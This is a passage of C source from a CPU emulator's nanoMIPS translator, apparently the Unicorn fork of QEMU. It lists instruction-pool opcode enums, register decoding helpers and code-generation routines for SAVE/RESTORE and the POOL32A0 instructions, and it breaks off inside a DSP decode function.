NM_LBUGP = 0x02, NM_ADDIUGP_B = 0x03, NM_P_GP_LH = 0x04, NM_P_GP_SH = 0x05, NM_P_GP_CP1 = 0x06, }; /* P.LS.U12 instruction pool */ enum { NM_LB = 0x00, NM_SB = 0x01, NM_LBU = 0x02, NM_P_PREFU12 = 0x03, NM_LH = 0x04, NM_SH = 0x05, NM_LHU = 0x06, NM_LWU = 0x07, NM_LW = 0x08, NM_SW = 0x09, NM_LWC1 = 0x0a, NM_SWC1 = 0x0b, NM_LDC1 = 0x0e, NM_SDC1 = 0x0f, }; /* P.LS.S9 instruction pool */ enum { NM_P_LS_S0 = 0x00, NM_P_LS_S1 = 0x01, NM_P_LS_E0 = 0x02, NM_P_LS_WM = 0x04, NM_P_LS_UAWM = 0x05, }; /* P.BAL instruction pool */ enum { NM_BC = 0x00, NM_BALC = 0x01, }; /* P.J instruction pool */ enum { NM_JALRC = 0x00, NM_JALRC_HB = 0x01, NM_P_BALRSC = 0x08, }; /* P.BR1 instruction pool */ enum { NM_BEQC = 0x00, NM_P_BR3A = 0x01, NM_BGEC = 0x02, NM_BGEUC = 0x03, }; /* P.BR2 instruction pool */ enum { NM_BNEC = 0x00, NM_BLTC = 0x02, NM_BLTUC = 0x03, }; /* P.BRI instruction pool */ enum { NM_BEQIC = 0x00, NM_BBEQZC = 0x01, NM_BGEIC = 0x02, NM_BGEIUC = 0x03, NM_BNEIC = 0x04, NM_BBNEZC = 0x05, NM_BLTIC = 0x06, NM_BLTIUC = 0x07, }; /* P16.SHIFT instruction pool */ enum { NM_SLL16 = 0x00, NM_SRL16 = 0x01, }; /* 
POOL16C instruction pool */ enum { NM_POOL16C_0 = 0x00, NM_LWXS16 = 0x01, }; /* P16.A1 instruction pool */ enum { NM_ADDIUR1SP = 0x01, }; /* P16.A2 instruction pool */ enum { NM_ADDIUR2 = 0x00, NM_P_ADDIURS5 = 0x01, }; /* P16.ADDU instruction pool */ enum { NM_ADDU16 = 0x00, NM_SUBU16 = 0x01, }; /* P16.SR instruction pool */ enum { NM_SAVE16 = 0x00, NM_RESTORE_JRC16 = 0x01, }; /* P16.4X4 instruction pool */ enum { NM_ADDU4X4 = 0x00, NM_MUL4X4 = 0x01, }; /* P16.LB instruction pool */ enum { NM_LB16 = 0x00, NM_SB16 = 0x01, NM_LBU16 = 0x02, }; /* P16.LH instruction pool */ enum { NM_LH16 = 0x00, NM_SH16 = 0x01, NM_LHU16 = 0x02, }; /* P.RI instruction pool */ enum { NM_SIGRIE = 0x00, NM_P_SYSCALL = 0x01, NM_BREAK = 0x02, NM_SDBBP = 0x03, }; /* POOL32A0 instruction pool */ enum { NM_P_TRAP = 0x00, NM_SEB = 0x01, NM_SLLV = 0x02, NM_MUL = 0x03, NM_MFC0 = 0x06, NM_MFHC0 = 0x07, NM_SEH = 0x09, NM_SRLV = 0x0a, NM_MUH = 0x0b, NM_MTC0 = 0x0e, NM_MTHC0 = 0x0f, NM_SRAV = 0x12, NM_MULU = 0x13, NM_ROTRV = 0x1a, NM_MUHU = 0x1b, NM_ADD = 0x22, NM_DIV = 0x23, NM_ADDU = 0x2a, NM_MOD = 0x2b, NM_SUB = 0x32, NM_DIVU = 0x33, NM_RDHWR = 0x38, NM_SUBU = 0x3a, NM_MODU = 0x3b, NM_P_CMOVE = 0x42, NM_FORK = 0x45, NM_MFTR = 0x46, NM_MFHTR = 0x47, NM_AND = 0x4a, NM_YIELD = 0x4d, NM_MTTR = 0x4e, NM_MTHTR = 0x4f, NM_OR = 0x52, NM_D_E_MT_VPE = 0x56, NM_NOR = 0x5a, NM_XOR = 0x62, NM_SLT = 0x6a, NM_P_SLTU = 0x72, NM_SOV = 0x7a, }; /* CRC32 instruction pool */ enum { NM_CRC32B = 0x00, NM_CRC32H = 0x01, NM_CRC32W = 0x02, NM_CRC32CB = 0x04, NM_CRC32CH = 0x05, NM_CRC32CW = 0x06, }; /* POOL32A5 instruction pool */ enum { NM_CMP_EQ_PH = 0x00, NM_CMP_LT_PH = 0x08, NM_CMP_LE_PH = 0x10, NM_CMPGU_EQ_QB = 0x18, NM_CMPGU_LT_QB = 0x20, NM_CMPGU_LE_QB = 0x28, NM_CMPGDU_EQ_QB = 0x30, NM_CMPGDU_LT_QB = 0x38, NM_CMPGDU_LE_QB = 0x40, NM_CMPU_EQ_QB = 0x48, NM_CMPU_LT_QB = 0x50, NM_CMPU_LE_QB = 0x58, NM_ADDQ_S_W = 0x60, NM_SUBQ_S_W = 0x68, NM_ADDSC = 0x70, NM_ADDWC = 0x78, NM_ADDQ_S_PH = 0x01, NM_ADDQH_R_PH = 0x09, NM_ADDQH_R_W = 0x11, NM_ADDU_S_QB = 0x19, NM_ADDU_S_PH = 0x21, NM_ADDUH_R_QB = 0x29, NM_SHRAV_R_PH = 0x31, NM_SHRAV_R_QB = 0x39, NM_SUBQ_S_PH = 0x41, NM_SUBQH_R_PH = 0x49, NM_SUBQH_R_W = 0x51, NM_SUBU_S_QB = 0x59, NM_SUBU_S_PH = 0x61, NM_SUBUH_R_QB = 0x69, NM_SHLLV_S_PH = 0x71, NM_PRECR_SRA_R_PH_W = 0x79, NM_MULEU_S_PH_QBL = 0x12, NM_MULEU_S_PH_QBR = 0x1a, NM_MULQ_RS_PH = 0x22, NM_MULQ_S_PH = 0x2a, NM_MULQ_RS_W = 0x32, NM_MULQ_S_W = 0x3a, NM_APPEND = 0x42, NM_MODSUB = 0x52, NM_SHRAV_R_W = 0x5a, NM_SHRLV_PH = 0x62, NM_SHRLV_QB = 0x6a, NM_SHLLV_QB = 0x72, NM_SHLLV_S_W = 0x7a, NM_SHILO = 0x03, NM_MULEQ_S_W_PHL = 0x04, NM_MULEQ_S_W_PHR = 0x0c, NM_MUL_S_PH = 0x05, NM_PRECR_QB_PH = 0x0d, NM_PRECRQ_QB_PH = 0x15, NM_PRECRQ_PH_W = 0x1d, NM_PRECRQ_RS_PH_W = 0x25, NM_PRECRQU_S_QB_PH = 0x2d, NM_PACKRL_PH = 0x35, NM_PICK_QB = 0x3d, NM_PICK_PH = 0x45, NM_SHRA_R_W = 0x5e, NM_SHRA_R_PH = 0x66, NM_SHLL_S_PH = 0x76, NM_SHLL_S_W = 0x7e, NM_REPL_PH = 0x07 }; /* POOL32A7 instruction pool */ enum { NM_P_LSX = 0x00, NM_LSA = 0x01, NM_EXTW = 0x03, NM_POOL32AXF = 0x07, }; /* P.SR instruction pool */ enum { NM_PP_SR = 0x00, NM_P_SR_F = 0x01, }; /* P.SHIFT instruction pool */ enum { NM_P_SLL = 0x00, NM_SRL = 0x02, NM_SRA = 0x04, NM_ROTR = 0x06, }; /* P.ROTX instruction pool */ enum { NM_ROTX = 0x00, }; /* P.INS instruction pool */ enum { NM_INS = 0x00, }; /* P.EXT instruction pool */ enum { NM_EXT = 0x00, }; /* POOL32F_0 (fmt) instruction pool */ enum { NM_RINT_S = 0x04, NM_RINT_D = 0x44, NM_ADD_S = 0x06, NM_SELEQZ_S = 0x07, NM_SELEQZ_D = 0x47, NM_CLASS_S = 
0x0c, NM_CLASS_D = 0x4c, NM_SUB_S = 0x0e, NM_SELNEZ_S = 0x0f, NM_SELNEZ_D = 0x4f, NM_MUL_S = 0x16, NM_SEL_S = 0x17, NM_SEL_D = 0x57, NM_DIV_S = 0x1e, NM_ADD_D = 0x26, NM_SUB_D = 0x2e, NM_MUL_D = 0x36, NM_MADDF_S = 0x37, NM_MADDF_D = 0x77, NM_DIV_D = 0x3e, NM_MSUBF_S = 0x3f, NM_MSUBF_D = 0x7f, }; /* POOL32F_3 instruction pool */ enum { NM_MIN_FMT = 0x00, NM_MAX_FMT = 0x01, NM_MINA_FMT = 0x04, NM_MAXA_FMT = 0x05, NM_POOL32FXF = 0x07, }; /* POOL32F_5 instruction pool */ enum { NM_CMP_CONDN_S = 0x00, NM_CMP_CONDN_D = 0x02, }; /* P.GP.LH instruction pool */ enum { NM_LHGP = 0x00, NM_LHUGP = 0x01, }; /* P.GP.SH instruction pool */ enum { NM_SHGP = 0x00, }; /* P.GP.CP1 instruction pool */ enum { NM_LWC1GP = 0x00, NM_SWC1GP = 0x01, NM_LDC1GP = 0x02, NM_SDC1GP = 0x03, }; /* P.LS.S0 instruction pool */ enum { NM_LBS9 = 0x00, NM_LHS9 = 0x04, NM_LWS9 = 0x08, NM_LDS9 = 0x0c, NM_SBS9 = 0x01, NM_SHS9 = 0x05, NM_SWS9 = 0x09, NM_SDS9 = 0x0d, NM_LBUS9 = 0x02, NM_LHUS9 = 0x06, NM_LWC1S9 = 0x0a, NM_LDC1S9 = 0x0e, NM_P_PREFS9 = 0x03, NM_LWUS9 = 0x07, NM_SWC1S9 = 0x0b, NM_SDC1S9 = 0x0f, }; /* P.LS.S1 instruction pool */ enum { NM_ASET_ACLR = 0x02, NM_UALH = 0x04, NM_UASH = 0x05, NM_CACHE = 0x07, NM_P_LL = 0x0a, NM_P_SC = 0x0b, }; /* P.LS.E0 instruction pool */ enum { NM_LBE = 0x00, NM_SBE = 0x01, NM_LBUE = 0x02, NM_P_PREFE = 0x03, NM_LHE = 0x04, NM_SHE = 0x05, NM_LHUE = 0x06, NM_CACHEE = 0x07, NM_LWE = 0x08, NM_SWE = 0x09, NM_P_LLE = 0x0a, NM_P_SCE = 0x0b, }; /* P.PREFE instruction pool */ enum { NM_SYNCIE = 0x00, NM_PREFE = 0x01, }; /* P.LLE instruction pool */ enum { NM_LLE = 0x00, NM_LLWPE = 0x01, }; /* P.SCE instruction pool */ enum { NM_SCE = 0x00, NM_SCWPE = 0x01, }; /* P.LS.WM instruction pool */ enum { NM_LWM = 0x00, NM_SWM = 0x01, }; /* P.LS.UAWM instruction pool */ enum { NM_UALWM = 0x00, NM_UASWM = 0x01, }; /* P.BR3A instruction pool */ enum { NM_BC1EQZC = 0x00, NM_BC1NEZC = 0x01, NM_BC2EQZC = 0x02, NM_BC2NEZC = 0x03, NM_BPOSGE32C = 0x04, }; /* P16.RI instruction pool */ enum { NM_P16_SYSCALL = 0x01, NM_BREAK16 = 0x02, NM_SDBBP16 = 0x03, }; /* POOL16C_0 instruction pool */ enum { NM_POOL16C_00 = 0x00, }; /* P16.JRC instruction pool */ enum { NM_JRC = 0x00, NM_JALRC16 = 0x01, }; /* P.SYSCALL instruction pool */ enum { NM_SYSCALL = 0x00, NM_HYPCALL = 0x01, }; /* P.TRAP instruction pool */ enum { NM_TEQ = 0x00, NM_TNE = 0x01, }; /* P.CMOVE instruction pool */ enum { NM_MOVZ = 0x00, NM_MOVN = 0x01, }; /* POOL32Axf instruction pool */ enum { NM_POOL32AXF_1 = 0x01, NM_POOL32AXF_2 = 0x02, NM_POOL32AXF_4 = 0x04, NM_POOL32AXF_5 = 0x05, NM_POOL32AXF_7 = 0x07, }; /* POOL32Axf_1 instruction pool */ enum { NM_POOL32AXF_1_0 = 0x00, NM_POOL32AXF_1_1 = 0x01, NM_POOL32AXF_1_3 = 0x03, NM_POOL32AXF_1_4 = 0x04, NM_POOL32AXF_1_5 = 0x05, NM_POOL32AXF_1_7 = 0x07, }; /* POOL32Axf_2 instruction pool */ enum { NM_POOL32AXF_2_0_7 = 0x00, NM_POOL32AXF_2_8_15 = 0x01, NM_POOL32AXF_2_16_23 = 0x02, NM_POOL32AXF_2_24_31 = 0x03, }; /* POOL32Axf_7 instruction pool */ enum { NM_SHRA_R_QB = 0x0, NM_SHRL_PH = 0x1, NM_REPL_QB = 0x2, }; /* POOL32Axf_1_0 instruction pool */ enum { NM_MFHI = 0x0, NM_MFLO = 0x1, NM_MTHI = 0x2, NM_MTLO = 0x3, }; /* POOL32Axf_1_1 instruction pool */ enum { NM_MTHLIP = 0x0, NM_SHILOV = 0x1, }; /* POOL32Axf_1_3 instruction pool */ enum { NM_RDDSP = 0x0, NM_WRDSP = 0x1, NM_EXTP = 0x2, NM_EXTPDP = 0x3, }; /* POOL32Axf_1_4 instruction pool */ enum { NM_SHLL_QB = 0x0, NM_SHRL_QB = 0x1, }; /* POOL32Axf_1_5 instruction pool */ enum { NM_MAQ_S_W_PHR = 0x0, NM_MAQ_S_W_PHL = 0x1, NM_MAQ_SA_W_PHR = 0x2, NM_MAQ_SA_W_PHL = 
0x3, }; /* POOL32Axf_1_7 instruction pool */ enum { NM_EXTR_W = 0x0, NM_EXTR_R_W = 0x1, NM_EXTR_RS_W = 0x2, NM_EXTR_S_H = 0x3, }; /* POOL32Axf_2_0_7 instruction pool */ enum { NM_DPA_W_PH = 0x0, NM_DPAQ_S_W_PH = 0x1, NM_DPS_W_PH = 0x2, NM_DPSQ_S_W_PH = 0x3, NM_BALIGN = 0x4, NM_MADD = 0x5, NM_MULT = 0x6, NM_EXTRV_W = 0x7, }; /* POOL32Axf_2_8_15 instruction pool */ enum { NM_DPAX_W_PH = 0x0, NM_DPAQ_SA_L_W = 0x1, NM_DPSX_W_PH = 0x2, NM_DPSQ_SA_L_W = 0x3, NM_MADDU = 0x5, NM_MULTU = 0x6, NM_EXTRV_R_W = 0x7, }; /* POOL32Axf_2_16_23 instruction pool */ enum { NM_DPAU_H_QBL = 0x0, NM_DPAQX_S_W_PH = 0x1, NM_DPSU_H_QBL = 0x2, NM_DPSQX_S_W_PH = 0x3, NM_EXTPV = 0x4, NM_MSUB = 0x5, NM_MULSA_W_PH = 0x6, NM_EXTRV_RS_W = 0x7, }; /* POOL32Axf_2_24_31 instruction pool */ enum { NM_DPAU_H_QBR = 0x0, NM_DPAQX_SA_W_PH = 0x1, NM_DPSU_H_QBR = 0x2, NM_DPSQX_SA_W_PH = 0x3, NM_EXTPDPV = 0x4, NM_MSUBU = 0x5, NM_MULSAQ_S_W_PH = 0x6, NM_EXTRV_S_H = 0x7, }; /* POOL32Axf_{4, 5} instruction pool */ enum { NM_CLO = 0x25, NM_CLZ = 0x2d, NM_TLBP = 0x01, NM_TLBR = 0x09, NM_TLBWI = 0x11, NM_TLBWR = 0x19, NM_TLBINV = 0x03, NM_TLBINVF = 0x0b, NM_DI = 0x23, NM_EI = 0x2b, NM_RDPGPR = 0x70, NM_WRPGPR = 0x78, NM_WAIT = 0x61, NM_DERET = 0x71, NM_ERETX = 0x79, /* nanoMIPS DSP instructions */ NM_ABSQ_S_QB = 0x00, NM_ABSQ_S_PH = 0x08, NM_ABSQ_S_W = 0x10, NM_PRECEQ_W_PHL = 0x28, NM_PRECEQ_W_PHR = 0x30, NM_PRECEQU_PH_QBL = 0x38, NM_PRECEQU_PH_QBR = 0x48, NM_PRECEU_PH_QBL = 0x58, NM_PRECEU_PH_QBR = 0x68, NM_PRECEQU_PH_QBLA = 0x39, NM_PRECEQU_PH_QBRA = 0x49, NM_PRECEU_PH_QBLA = 0x59, NM_PRECEU_PH_QBRA = 0x69, NM_REPLV_PH = 0x01, NM_REPLV_QB = 0x09, NM_BITREV = 0x18, NM_INSV = 0x20, NM_RADDU_W_QB = 0x78, NM_BITSWAP = 0x05, NM_WSBH = 0x3d, }; /* PP.SR instruction pool */ enum { NM_SAVE = 0x00, NM_RESTORE = 0x02, NM_RESTORE_JRC = 0x03, }; /* P.SR.F instruction pool */ enum { NM_SAVEF = 0x00, NM_RESTOREF = 0x01, }; /* P16.SYSCALL instruction pool */ enum { NM_SYSCALL16 = 0x00, NM_HYPCALL16 = 0x01, }; /* POOL16C_00 instruction pool */ enum { NM_NOT16 = 0x00, NM_XOR16 = 0x01, NM_AND16 = 0x02, NM_OR16 = 0x03, }; /* PP.LSX and PP.LSXS instruction pool */ enum { NM_LBX = 0x00, NM_LHX = 0x04, NM_LWX = 0x08, NM_LDX = 0x0c, NM_SBX = 0x01, NM_SHX = 0x05, NM_SWX = 0x09, NM_SDX = 0x0d, NM_LBUX = 0x02, NM_LHUX = 0x06, NM_LWC1X = 0x0a, NM_LDC1X = 0x0e, NM_LWUX = 0x07, NM_SWC1X = 0x0b, NM_SDC1X = 0x0f, NM_LHXS = 0x04, NM_LWXS = 0x08, NM_LDXS = 0x0c, NM_SHXS = 0x05, NM_SWXS = 0x09, NM_SDXS = 0x0d, NM_LHUXS = 0x06, NM_LWC1XS = 0x0a, NM_LDC1XS = 0x0e, NM_LWUXS = 0x07, NM_SWC1XS = 0x0b, NM_SDC1XS = 0x0f, }; /* ERETx instruction pool */ enum { NM_ERET = 0x00, NM_ERETNC = 0x01, }; /* POOL32FxF_{0, 1} instruction pool */ enum { NM_CFC1 = 0x40, NM_CTC1 = 0x60, NM_MFC1 = 0x80, NM_MTC1 = 0xa0, NM_MFHC1 = 0xc0, NM_MTHC1 = 0xe0, NM_CVT_S_PL = 0x84, NM_CVT_S_PU = 0xa4, NM_CVT_L_S = 0x004, NM_CVT_L_D = 0x104, NM_CVT_W_S = 0x024, NM_CVT_W_D = 0x124, NM_RSQRT_S = 0x008, NM_RSQRT_D = 0x108, NM_SQRT_S = 0x028, NM_SQRT_D = 0x128, NM_RECIP_S = 0x048, NM_RECIP_D = 0x148, NM_FLOOR_L_S = 0x00c, NM_FLOOR_L_D = 0x10c, NM_FLOOR_W_S = 0x02c, NM_FLOOR_W_D = 0x12c, NM_CEIL_L_S = 0x04c, NM_CEIL_L_D = 0x14c, NM_CEIL_W_S = 0x06c, NM_CEIL_W_D = 0x16c, NM_TRUNC_L_S = 0x08c, NM_TRUNC_L_D = 0x18c, NM_TRUNC_W_S = 0x0ac, NM_TRUNC_W_D = 0x1ac, NM_ROUND_L_S = 0x0cc, NM_ROUND_L_D = 0x1cc, NM_ROUND_W_S = 0x0ec, NM_ROUND_W_D = 0x1ec, NM_MOV_S = 0x01, NM_MOV_D = 0x81, NM_ABS_S = 0x0d, NM_ABS_D = 0x8d, NM_NEG_S = 0x2d, NM_NEG_D = 0xad, NM_CVT_D_S = 0x04d, NM_CVT_D_W = 0x0cd, NM_CVT_D_L = 0x14d, 
NM_CVT_S_D = 0x06d, NM_CVT_S_W = 0x0ed, NM_CVT_S_L = 0x16d, }; /* P.LL instruction pool */ enum { NM_LL = 0x00, NM_LLWP = 0x01, }; /* P.SC instruction pool */ enum { NM_SC = 0x00, NM_SCWP = 0x01, }; /* P.DVP instruction pool */ enum { NM_DVP = 0x00, NM_EVP = 0x01, }; /* * * nanoMIPS decoding engine * */ /* extraction utilities */ #define NANOMIPS_EXTRACT_RT3(op) ((op >> 7) & 0x7) #define NANOMIPS_EXTRACT_RS3(op) ((op >> 4) & 0x7) #define NANOMIPS_EXTRACT_RD3(op) ((op >> 1) & 0x7) #define NANOMIPS_EXTRACT_RD5(op) ((op >> 5) & 0x1f) #define NANOMIPS_EXTRACT_RS5(op) (op & 0x1f) /* Implement nanoMIPS pseudocode decode_gpr(encoded_gpr, 'gpr3'). */ static inline int decode_gpr_gpr3(int r) { static const int map[] = { 16, 17, 18, 19, 4, 5, 6, 7 }; return map[r & 0x7]; } /* Implement nanoMIPS pseudocode decode_gpr(encoded_gpr, 'gpr3.src.store'). */ static inline int decode_gpr_gpr3_src_store(int r) { static const int map[] = { 0, 17, 18, 19, 4, 5, 6, 7 }; return map[r & 0x7]; } /* Implement nanoMIPS pseudocode decode_gpr(encoded_gpr, 'gpr4'). */ static inline int decode_gpr_gpr4(int r) { static const int map[] = { 8, 9, 10, 11, 4, 5, 6, 7, 16, 17, 18, 19, 20, 21, 22, 23 }; return map[r & 0xf]; } /* Implement nanoMIPS pseudocode decode_gpr(encoded_gpr, 'gpr4.zero'). */ static inline int decode_gpr_gpr4_zero(int r) { static const int map[] = { 8, 9, 10, 0, 4, 5, 6, 7, 16, 17, 18, 19, 20, 21, 22, 23 }; return map[r & 0xf]; } static void gen_adjust_sp(DisasContext *ctx, int u) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; gen_op_addr_addi(ctx, tcg_ctx->cpu_gpr[29], tcg_ctx->cpu_gpr[29], u); } static void gen_save(DisasContext *ctx, uint8_t rt, uint8_t count, uint8_t gp, uint16_t u) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; int counter = 0; TCGv va = tcg_temp_new(tcg_ctx); TCGv t0 = tcg_temp_new(tcg_ctx); while (counter != count) { bool use_gp = gp && (counter == count - 1); int this_rt = use_gp ? 28 : (rt & 0x10) | ((rt + counter) & 0x1f); int this_offset = -((counter + 1) << 2); gen_base_offset_addr(ctx, va, 29, this_offset); gen_load_gpr(tcg_ctx, t0, this_rt); tcg_gen_qemu_st_tl(tcg_ctx, t0, va, ctx->mem_idx, (MO_TEUL | ctx->default_tcg_memop_mask)); counter++; } /* adjust stack pointer */ gen_adjust_sp(ctx, -u); tcg_temp_free(tcg_ctx, t0); tcg_temp_free(tcg_ctx, va); } static void gen_restore(DisasContext *ctx, uint8_t rt, uint8_t count, uint8_t gp, uint16_t u) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; int counter = 0; TCGv va = tcg_temp_new(tcg_ctx); TCGv t0 = tcg_temp_new(tcg_ctx); while (counter != count) { bool use_gp = gp && (counter == count - 1); int this_rt = use_gp ? 
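/* SAVE register list: successive slots store (rt & 0x10) | ((rt + counter) & 0x1f), so a list starting at r30 wraps to r16 (rt = 30, count = 4 stores r30, r31, r16, r17); with gp set the final slot stores r28 ($gp) instead. Values land just below the incoming SP, which is then dropped by u. */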
28 : (rt & 0x10) | ((rt + counter) & 0x1f); int this_offset = u - ((counter + 1) << 2); gen_base_offset_addr(ctx, va, 29, this_offset); tcg_gen_qemu_ld_tl(tcg_ctx, t0, va, ctx->mem_idx, MO_TESL | ctx->default_tcg_memop_mask); tcg_gen_ext32s_tl(tcg_ctx, t0, t0); gen_store_gpr(tcg_ctx, t0, this_rt); counter++; } /* adjust stack pointer */ gen_adjust_sp(ctx, u); tcg_temp_free(tcg_ctx, t0); tcg_temp_free(tcg_ctx, va); } static void gen_pool16c_nanomips_insn(DisasContext *ctx) { int rt = decode_gpr_gpr3(NANOMIPS_EXTRACT_RT3(ctx->opcode)); int rs = decode_gpr_gpr3(NANOMIPS_EXTRACT_RS3(ctx->opcode)); switch (extract32(ctx->opcode, 2, 2)) { case NM_NOT16: gen_logic(ctx, OPC_NOR, rt, rs, 0); break; case NM_AND16: gen_logic(ctx, OPC_AND, rt, rt, rs); break; case NM_XOR16: gen_logic(ctx, OPC_XOR, rt, rt, rs); break; case NM_OR16: gen_logic(ctx, OPC_OR, rt, rt, rs); break; } } static void gen_pool32a0_nanomips_insn(CPUMIPSState *env, DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; int rt = extract32(ctx->opcode, 21, 5); int rs = extract32(ctx->opcode, 16, 5); int rd = extract32(ctx->opcode, 11, 5); switch (extract32(ctx->opcode, 3, 7)) { case NM_P_TRAP: switch (extract32(ctx->opcode, 10, 1)) { case NM_TEQ: check_nms(ctx); gen_trap(ctx, OPC_TEQ, rs, rt, -1); break; case NM_TNE: check_nms(ctx); gen_trap(ctx, OPC_TNE, rs, rt, -1); break; } break; case NM_RDHWR: check_nms(ctx); gen_rdhwr(ctx, rt, rs, extract32(ctx->opcode, 11, 3)); break; case NM_SEB: check_nms(ctx); gen_bshfl(ctx, OPC_SEB, rs, rt); break; case NM_SEH: gen_bshfl(ctx, OPC_SEH, rs, rt); break; case NM_SLLV: gen_shift(ctx, OPC_SLLV, rd, rt, rs); break; case NM_SRLV: gen_shift(ctx, OPC_SRLV, rd, rt, rs); break; case NM_SRAV: gen_shift(ctx, OPC_SRAV, rd, rt, rs); break; case NM_ROTRV: gen_shift(ctx, OPC_ROTRV, rd, rt, rs); break; case NM_ADD: gen_arith(ctx, OPC_ADD, rd, rs, rt); break; case NM_ADDU: gen_arith(ctx, OPC_ADDU, rd, rs, rt); break; case NM_SUB: check_nms(ctx); gen_arith(ctx, OPC_SUB, rd, rs, rt); break; case NM_SUBU: gen_arith(ctx, OPC_SUBU, rd, rs, rt); break; case NM_P_CMOVE: switch (extract32(ctx->opcode, 10, 1)) { case NM_MOVZ: gen_cond_move(ctx, OPC_MOVZ, rd, rs, rt); break; case NM_MOVN: gen_cond_move(ctx, OPC_MOVN, rd, rs, rt); break; } break; case NM_AND: gen_logic(ctx, OPC_AND, rd, rs, rt); break; case NM_OR: gen_logic(ctx, OPC_OR, rd, rs, rt); break; case NM_NOR: gen_logic(ctx, OPC_NOR, rd, rs, rt); break; case NM_XOR: gen_logic(ctx, OPC_XOR, rd, rs, rt); break; case NM_SLT: gen_slt(ctx, OPC_SLT, rd, rs, rt); break; case NM_P_SLTU: if (rd == 0) { /* P_DVP */ TCGv t0 = tcg_temp_new(tcg_ctx); switch (extract32(ctx->opcode, 10, 1)) { case NM_DVP: if (ctx->vp) { check_cp0_enabled(ctx); gen_helper_dvp(tcg_ctx, t0, tcg_ctx->cpu_env); gen_store_gpr(tcg_ctx, t0, rt); } break; case NM_EVP: if (ctx->vp) { check_cp0_enabled(ctx); gen_helper_evp(tcg_ctx, t0, tcg_ctx->cpu_env); gen_store_gpr(tcg_ctx, t0, rt); } break; } tcg_temp_free(tcg_ctx, t0); } else { gen_slt(ctx, OPC_SLTU, rd, rs, rt); } break; case NM_SOV: { TCGv t0 = tcg_temp_new(tcg_ctx); TCGv t1 = tcg_temp_new(tcg_ctx); TCGv t2 = tcg_temp_new(tcg_ctx); gen_load_gpr(tcg_ctx, t1, rs); gen_load_gpr(tcg_ctx, t2, rt); tcg_gen_add_tl(tcg_ctx, t0, t1, t2); tcg_gen_ext32s_tl(tcg_ctx, t0, t0); tcg_gen_xor_tl(tcg_ctx, t1, t1, t2); tcg_gen_xor_tl(tcg_ctx, t2, t0, t2); tcg_gen_andc_tl(tcg_ctx, t1, t2, t1); /* operands of same sign, result different sign */ tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_LT, t0, t1, 0); gen_store_gpr(tcg_ctx, t0, rd); tcg_temp_free(tcg_ctx, t0); 
tcg_temp_free(tcg_ctx, t1); tcg_temp_free(tcg_ctx, t2); } break; case NM_MUL: gen_r6_muldiv(ctx, R6_OPC_MUL, rd, rs, rt); break; case NM_MUH: gen_r6_muldiv(ctx, R6_OPC_MUH, rd, rs, rt); break; case NM_MULU: gen_r6_muldiv(ctx, R6_OPC_MULU, rd, rs, rt); break; case NM_MUHU: gen_r6_muldiv(ctx, R6_OPC_MUHU, rd, rs, rt); break; case NM_DIV: gen_r6_muldiv(ctx, R6_OPC_DIV, rd, rs, rt); break; case NM_MOD: gen_r6_muldiv(ctx, R6_OPC_MOD, rd, rs, rt); break; case NM_DIVU: gen_r6_muldiv(ctx, R6_OPC_DIVU, rd, rs, rt); break; case NM_MODU: gen_r6_muldiv(ctx, R6_OPC_MODU, rd, rs, rt); break; case NM_MFC0: check_cp0_enabled(ctx); if (rt == 0) { /* Treat as NOP. */ break; } gen_mfc0(ctx, tcg_ctx->cpu_gpr[rt], rs, extract32(ctx->opcode, 11, 3)); break; case NM_MTC0: check_cp0_enabled(ctx); { TCGv t0 = tcg_temp_new(tcg_ctx); gen_load_gpr(tcg_ctx, t0, rt); gen_mtc0(ctx, t0, rs, extract32(ctx->opcode, 11, 3)); tcg_temp_free(tcg_ctx, t0); } break; case NM_D_E_MT_VPE: { uint8_t sc = extract32(ctx->opcode, 10, 1); TCGv t0 = tcg_temp_new(tcg_ctx); switch (sc) { case 0: if (rs == 1) { /* DMT */ check_cp0_mt(ctx); gen_helper_dmt(tcg_ctx, t0); gen_store_gpr(tcg_ctx, t0, rt); } else if (rs == 0) { /* DVPE */ check_cp0_mt(ctx); gen_helper_dvpe(tcg_ctx, t0, tcg_ctx->cpu_env); gen_store_gpr(tcg_ctx, t0, rt); } else { generate_exception_end(ctx, EXCP_RI); } break; case 1: if (rs == 1) { /* EMT */ check_cp0_mt(ctx); gen_helper_emt(tcg_ctx, t0); gen_store_gpr(tcg_ctx, t0, rt); } else if (rs == 0) { /* EVPE */ check_cp0_mt(ctx); gen_helper_evpe(tcg_ctx, t0, tcg_ctx->cpu_env); gen_store_gpr(tcg_ctx, t0, rt); } else { generate_exception_end(ctx, EXCP_RI); } break; } tcg_temp_free(tcg_ctx, t0); } break; case NM_FORK: check_mt(ctx); { TCGv t0 = tcg_temp_new(tcg_ctx); TCGv t1 = tcg_temp_new(tcg_ctx); gen_load_gpr(tcg_ctx, t0, rt); gen_load_gpr(tcg_ctx, t1, rs); gen_helper_fork(tcg_ctx, t0, t1); tcg_temp_free(tcg_ctx, t0); tcg_temp_free(tcg_ctx, t1); } break; case NM_MFTR: case NM_MFHTR: check_cp0_enabled(ctx); if (rd == 0) { /* Treat as NOP. 
*/ return; } gen_mftr(env, ctx, rs, rt, extract32(ctx->opcode, 10, 1), extract32(ctx->opcode, 11, 5), extract32(ctx->opcode, 3, 1)); break; case NM_MTTR: case NM_MTHTR: check_cp0_enabled(ctx); gen_mttr(env, ctx, rs, rt, extract32(ctx->opcode, 10, 1), extract32(ctx->opcode, 11, 5), extract32(ctx->opcode, 3, 1)); break; case NM_YIELD: check_mt(ctx); { TCGv t0 = tcg_temp_new(tcg_ctx); gen_load_gpr(tcg_ctx, t0, rs); gen_helper_yield(tcg_ctx, t0, tcg_ctx->cpu_env, t0); gen_store_gpr(tcg_ctx, t0, rt); tcg_temp_free(tcg_ctx, t0); } break; default: generate_exception_end(ctx, EXCP_RI); break; } } /* dsp */ static void gen_pool32axf_1_5_nanomips_insn(DisasContext *ctx, uint32_t opc, int ret, int v1, int v2) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i32 t0; TCGv v0_t; TCGv v1_t; t0 = tcg_temp_new_i32(tcg_ctx); v0_t = tcg_temp_new(tcg_ctx); v1_t = tcg_temp_new(tcg_ctx); tcg_gen_movi_i32(tcg_ctx, t0, v2 >> 3); gen_load_gpr(tcg_ctx, v0_t, ret); gen_load_gpr(tcg_ctx, v1_t, v1); switch (opc) { case NM_MAQ_S_W_PHR: 